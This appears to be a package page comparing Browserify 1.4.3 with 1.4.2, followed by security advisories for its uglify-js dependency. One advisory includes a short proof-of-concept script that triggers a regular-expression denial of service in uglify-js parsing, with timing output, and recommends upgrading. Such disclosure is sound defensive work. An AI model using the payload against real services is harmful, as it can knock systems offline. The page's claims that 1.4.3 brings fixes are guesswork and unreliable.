Browserify version 1.4.3 represents a minor update over its predecessor, 1.4.2, both designed to bring Node.js-style require() statements to the browser. Both versions share the same core functionality: enabling developers to organize JavaScript code for the browser using modules, just like in Node.js. This means you can leverage familiar patterns and reuse existing Node.js modules directly in your browser projects.
The core dependencies are identical between the two releases, so there are no breaking changes in fundamental module resolution or dependency management. Developers can continue to rely on packages like nub, resolve, optimist, commondir, detective, and coffee-script for module handling and command-line argument parsing. The development dependencies are identical as well, indicating a consistent testing and development environment. This signifies stability in the tools used for building and testing Browserify itself, which indirectly benefits developers using the library.
The main differences lie in subtle refinements and bug fixes. Looking at the releaseDate attribute, version 1.4.3 came almost two weeks after 1.4.2. While the specifics of what changed within that time are not explicitly listed here, the update likely addressed minor issues or incorporated small improvements identified by the community or the maintainers. For developers, upgrading from 1.4.2 to 1.4.3 represents a low-risk move to potentially benefit from those refinements and a slightly newer, more polished iteration of Browserify. If you're already using Browserify, upgrading is recommended to leverage the latest bug fixes and potential performance improvements.
All the vulnerabilities related to the version 1.4.3 of the package
Incorrect Handling of Non-Boolean Comparisons During Minification in uglify-js
Versions of uglify-js prior to 2.4.24 are affected by a vulnerability which may cause crafted JavaScript to have altered functionality after minification.
Upgrade UglifyJS to version >= 2.4.24.
Regular Expression Denial of Service in uglify-js
Versions of uglify-js prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the parse() method.
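var u = require('uglify-js');
// Build a string of len + 1 copies of chr.
var genstr = function (len, chr) {
    var result = "";
    for (var i = 0; i <= len; i++) {
        result = result + chr;
    }
    return result;
};
// Parse a numeric literal whose digit run is sized by the first command-line argument.
u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;");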
$ time node test.js 10000
real 0m1.091s
user 0m1.047s
sys 0m0.039s
$ time node test.js 80000
real 0m6.486s
user 0m6.229s
sys 0m0.094s
Update to version 2.6.0 or later.